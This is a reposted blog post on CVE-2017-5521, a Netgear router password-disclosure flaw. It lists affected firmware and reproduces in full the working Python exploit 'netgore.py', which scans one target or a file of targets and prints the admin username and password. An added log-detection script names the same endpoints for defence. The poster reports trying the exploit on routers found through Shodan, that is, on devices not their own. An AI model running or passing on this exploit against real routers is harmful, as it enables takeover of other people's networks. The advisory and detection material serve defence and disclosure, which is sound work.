A vulnerability disclosed yesterday by SpiderLabs: when a user visits the router's web admin interface, attempts to authenticate and then cancels the authentication, the user is redirected to a page that exposes the password-recovery token. The router administrator password can then be retrieved via passwordrecovered.cgi?id=TOKEN.

Vulnerability details

https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911

Affected versions:

Finding 1: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 and above not affected)
# D6400 V1.0.0.34_1.3.34
# D6400 V1.0.0.38_1.1.38
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.24_5.0.8 (V1.0.0.66_1.0.66 is latest and is not affected)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.48_1.0.37 (V1.0.1.52_1.0.41 and above are not affected)
# R6200v2 V1.0.1.20_1.0.18 (V1.0.3.10_10.1.10 is latest and is not affected)
# R6250 V1.0.1.84_1.0.78 (V1.0.4.2_10.1.10 is latest and is not affected)
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.30_10.0.73
# R6700 V1.0.1.14_10.0.29 (Latest beta)
# R6700 V1.0.0.26_10.0.26 (Latest stable)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.2.30_1.0.43 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.26_1.0.41
# R8500 V1.0.0.56_1.0.28
# R8500 V1.0.0.20_1.0.11
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.29_1.0.29
# VEGN2610 V1.0.0.27_1.0.27
# WNDR3400v2 V1.0.0.16_1.0.34 (V1.0.0.52_1.0.81 is latest and is not affected)
# WNDR3400v3 V1.0.0.22_1.0.29 (V1.0.1.2_1.0.51 is latest and is not affected)
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.42_1.0.25
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# WN3100RP V1.0.0.14_1.0.19 (Latest)
# WN3100RP V1.0.0.6_1.0.12
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13

Finding 2: Remote and Local Password Disclosure
Credit: Simon Kenin of Trustwave SpiderLabs
CVE: CVE-2017-5521
Version affected: # AC1450 V1.0.0.34_10.0.16 (Latest)
# AC1450 V1.0.0.22_1.0.10
# AC1450 V1.0.0.14_1.0.6
# D6300 V1.0.0.96_1.1.96 (Latest)
# D6300B V1.0.0.36_1.0.36
# D6300B V1.0.0.32_1.0.32
# D6400 V1.0.0.44_1.0.44 (V1.0.0.52_1.0.52 is latest and is patched)
# D6400 V1.0.0.22_1.0.22
# DC112A V1.0.0.30_1.0.60 (Latest)
# DGN2200v4 V1.0.0.76_1.0.76 (Latest)
# DGN2200v4 V1.0.0.66_1.0.66
# DGN2200Bv4 V1.0.0.68_1.0.68 (Latest)
# JNDR3000 V1.0.0.18_1.0.16 (Latest)
# R6200 V1.0.1.56_1.0.43 (Latest)
# R6200 V1.0.1.52_1.0.41
# R6200 V1.0.1.48_1.0.37
# R6200v2 V1.0.3.10_10.1.10 (Latest)
# R6200v2 V1.0.1.20_1.0.18
# R6250 V1.0.4.6_10.1.12 (Latest beta)
# R6250 V1.0.4.2_10.1.10 (Latest stable)
# R6250 V1.0.1.84_1.0.78
# R6300 V1.0.2.78_1.0.58 (Latest)
# R6300v2 V1.0.4.2_10.0.74 (V1.0.4.6_10.0.76 is latest and is patched)
# R6300v2 V1.0.3.6_1.0.63CH (Charter Comm.)
# R6400 V1.0.0.26_1.0.14 (V1.0.1.12_1.0.11 is latest and is patched)
# R6700 V1.0.0.26_10.0.26 (Latest)
# R6700 V1.0.0.24_10.0.18
# R6900 V1.0.0.4_1.0.10 (Latest)
# R7000 V1.0.6.28_1.1.83 (V1.0.7.2_1.1.93 is latest and is patched)
# R7000 V1.0.4.30_1.1.67
# R7900 V1.0.1.8_10.0.14 (Latest beta)
# R7900 V1.0.1.4_10.0.12 (Latest stable)
# R7900 V1.0.0.10_10.0.7
# R7900 V1.0.0.8_10.0.5
# R7900 V1.0.0.6_10.0.4
# R8000 V1.0.3.26_1.1.18 (Latest beta)
# R8000 V1.0.3.4_1.1.2 (Latest stable)
# R8300 V1.0.2.48_1.0.52
# R8500 V1.0.0.56_1.0.28 (V1.0.2.64_1.0.62 and above is patched)
# R8500 V1.0.2.30_1.0.43
# VEGN2610 V1.0.0.35_1.0.35 (Latest)
# VEGN2610 V1.0.0.27_1.0.27
# VEGN2610-1FXAUS V1.0.0.36_1.0.36 (Latest)
# VEVG2660 V1.0.0.23_1.0.23
# WNDR3400v2 V1.0.0.52_1.0.81 (Latest)
# WNDR3400v3 V1.0.1.4_1.0.52 (Latest)
# WNDR3400v3 V1.0.1.2_1.0.51
# WNDR3400v3 V1.0.0.22_1.0.29
# WNDR3700v3 V1.0.0.38_1.0.31 (Latest)
# WNDR4000 V1.0.2.4_9.1.86 (Latest)
# WNDR4500 V1.0.1.40_1.0.68 (Latest)
# WNDR4500 V1.0.1.6_1.0.24
# WNDR4500v2 V1.0.0.60_1.0.38 (Latest)
# WNDR4500v2 V1.0.0.50_1.0.30
# WNR1000v3 V1.0.2.68_60.0.93NA (Latest)
# WNR1000v3 V1.0.2.62_60.0.87 (Latest)
# WNR3500Lv2 V1.2.0.34_40.0.75 (Latest)
# WNR3500Lv2 V1.2.0.32_40.0.74
# WGR614v10 V1.0.2.60_60.0.85NA (Latest)
# WGR614v10 V1.0.2.58_60.0.84NA
# WGR614v10 V1.0.2.54_60.0.82NA
# Lenovo R3220 V1.0.0.16_1.0.16 (Latest)
# Lenovo R3220 V1.0.0.13_1.0.13

Netgear exploit (netgore.py, as published by Trustwave; Python 2):

## netgore.py
import sys
import requests


def scrape(text, start_trig, end_trig):
    # return the substring between the first start_trig and the following end_trig
    if text.find(start_trig) != -1:
        return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
    else:
        return "i_dont_speak_english"


def exp1(ip, port):
    # disable nasty insecure ssl warning
    requests.packages.urllib3.disable_warnings()
    # 1st stage - get token
    url = 'http://' + ip + ':' + port + '/'
    try:
        r = requests.get(url)
    except:
        url = 'https://' + ip + ':' + port + '/'
        r = requests.get(url, verify=False)
    model = r.headers.get('WWW-Authenticate')
    if model is not None:
        print "Attacking: " + model[13:-1]
    else:
        print "not a netgear router"
        # sys.exit(0)
    token = scrape(r.text, 'unauth.cgi?id=', '\"')
    if token == 'i_dont_speak_english':
        print "not vulnerable"
        # sys.exit(0)
        return
    print "token found: " + token
    # 2nd stage - pass the token - get the password
    url = url + 'passwordrecovered.cgi?id=' + token
    r = requests.post(url, verify=False)
    # profit
    if r.text.find('left\">') != -1:
        username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
        username = scrape(username, '>', '\'')
        password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
        password = scrape(password, '>', '\'')
        if username == "i_dont_speak_english":
            username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
            password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
    else:
        print "not vulnerable because password recovery IS set"
        # sys.exit(0)
        return
    # html encoding pops out of nowhere, lets replace that
    password = password.replace("&#35;", "#")
    password = password.replace("&amp;", "&")
    print "user: " + username
    print "pass: " + password


def exp2(ip, port):
    # disable nasty insecure ssl warning
    requests.packages.urllib3.disable_warnings()
    # 1st stage
    url = 'http://' + ip + ':' + port + '/'
    try:
        r = requests.get(url)
    except:
        url = 'https://' + ip + ':' + port + '/'
        r = requests.get(url, verify=False)
    model = r.headers.get('WWW-Authenticate')
    if model is not None:
        print "Attacking: " + model[13:-1]
    else:
        print "not a netgear router"
        # sys.exit(0)
        return
    # 2nd stage
    url = url + 'passwordrecovered.cgi?id=get_rekt'
    try:
        r = requests.post(url, verify=False)
    except:
        print "not vulnerable router"
        # sys.exit(0)
    # profit
    if r.text.find('left\">') != -1:
        username = (repr(scrape(r.text, 'Router Admin Username</td>', '</td>')))
        username = scrape(username, '>', '\'')
        password = (repr(scrape(r.text, 'Router Admin Password</td>', '</td>')))
        password = scrape(password, '>', '\'')
        if username == "i_dont_speak_english":
            username = (scrape(r.text[r.text.find('left\">'):-1], 'left\">', '</td>'))
            password = (scrape(r.text[r.text.rfind('left\">'):-1], 'left\">', '</td>'))
    else:
        print "not vulnerable router, or some one else already accessed passwordrecovered.cgi, reboot router and test again"
        # sys.exit(0)
        return
    # html encoding pops out of nowhere, lets replace that
    password = password.replace("&#35;", "#")
    password = password.replace("&amp;", "&")
    print "user: " + username
    print "pass: " + password


if __name__ == "__main__":
    if len(sys.argv) > 1:
        ip = sys.argv[1]
        port = sys.argv[2]
        print '---------start------------'
        print 'target', ip, port
        print '---------exp1------------'
        exp1(ip, port)
        print '---------exp2------------'
        exp2(ip, port)
    else:
        # target.txt lines are expected as '<ip> <something> <port>' (fields 1 and 3)
        f = open('target.txt')
        for line in f:
            line = line.strip()
            l = line.split(' ')
            if len(l) > 1:
                # print l
                ip = l[0]
                port = l[2]
                print '---------start------------'
                print 'target', ip, port
                print '---------exp1------------'
                exp1(ip, port)
                print '---------exp2------------'
                exp2(ip, port)
        f.close()
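As an added example (not from the original post or the Trustwave script), the following Python 3 detection logic flags, in an HTTP access log, the two request sequences the script above produces: exp1 (a recovery token handed out by the unauth.cgi redirect and then replayed to passwordrecovered.cgi) and exp2 (passwordrecovered.cgi called with an id the client was never given). It assumes the admin interface's requests are recorded in Common Log Format by something in front of the router, such as a reverse proxy or a network sensor; the log lines are constructed, and the endpoint names are the ones the script uses.

```python
"""Added example (not part of the original post or the Trustwave script):
flag CVE-2017-5521 exploitation patterns in HTTP access logs.

Assumption: requests to the router's admin interface are visible in a
Common Log Format access log (for example from a reverse proxy or a
network sensor in front of the device); Netgear routers do not
necessarily log in this format themselves."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed sample log lines modelled on the two request sequences the
# netgore.py script produces (exp1: token replay; exp2: arbitrary id).
# These are invented records, not real captures.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2017:10:02:11 +0000] "GET / HTTP/1.1" 401 523',
    '203.0.113.7 - - [19/Jan/2017:10:02:12 +0000] "GET /unauth.cgi?id=1234567 HTTP/1.1" 200 1802',
    '203.0.113.7 - - [19/Jan/2017:10:02:13 +0000] "POST /passwordrecovered.cgi?id=1234567 HTTP/1.1" 200 911',
    '198.51.100.4 - - [19/Jan/2017:10:05:40 +0000] "POST /passwordrecovered.cgi?id=get_rekt HTTP/1.1" 200 911',
    '192.168.1.20 - admin [19/Jan/2017:10:07:02 +0000] "GET /start.htm HTTP/1.1" 200 4410',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
ID_RE = re.compile(r'[?&]id=([^&\s]*)')


@dataclass
class Finding:
    ip: str
    ts: str
    rule: str      # 'token-issued' (info), 'token-replay' or 'arbitrary-id' (high)
    detail: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the CLF fields of one line, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def recovery_id(path: str) -> str:
    """Extract the id= query value from a request path ('' if absent)."""
    m = ID_RE.search(path)
    return m.group(1) if m else ''


def detect(lines: List[str]) -> List[Finding]:
    """Walk the log in order, remembering which recovery tokens each client
    received through an unauth.cgi redirect, and flag every call to
    passwordrecovered.cgi: with a token the client was just handed (exp1) or
    with an id that was never issued to it at all (exp2)."""
    issued: Dict[str, Set[str]] = {}
    findings: List[Finding] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path = rec['ip'], rec['ts'], rec['path']
        if path.startswith('/unauth.cgi'):
            token = recovery_id(path)
            if token:
                issued.setdefault(ip, set()).add(token)
                findings.append(Finding(ip, ts, 'token-issued',
                                        'recovery token %s handed to unauthenticated client' % token))
        elif path.startswith('/passwordrecovered.cgi'):
            token = recovery_id(path)
            if token in issued.get(ip, set()):
                findings.append(Finding(ip, ts, 'token-replay',
                                        'passwordrecovered.cgi called with token %s from a cancelled login, no authenticated session' % token))
            else:
                findings.append(Finding(ip, ts, 'arbitrary-id',
                                        'passwordrecovered.cgi called with an id never issued to this client: %r' % token))
    return findings


def high_severity(findings: List[Finding]) -> List[Finding]:
    """Only the findings that indicate a credential disclosure attempt."""
    return [f for f in findings if f.rule in ('token-replay', 'arbitrary-id')]


if __name__ == '__main__':
    for f in detect(SAMPLE_LOG):
        print(f.ts, f.ip, f.rule, '-', f.detail)
```

Run stand-alone it reports three findings for the sample log: one informational `token-issued` and two high-severity hits, one per client. The rule names follow the script's two stages: `token-replay` is exp1 and `arbitrary-id` is exp2. The script's own "password recovery IS set" branch also names the mitigation short of a firmware upgrade: with the password-recovery feature enabled the endpoint no longer hands back the credentials this way; the firmware versions marked patched in the list above are the fix proper.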


I tested a few Netgear devices found through a Shodan search; the vulnerability works reliably.

Reposted from: https://www.cnblogs.com/xiaoxiaoleo/p/6360260.html

Post title: CVE-2017-5521: Bypassing Authentication on NETGEAR Routers (Netgear authentication bypass vulnerability)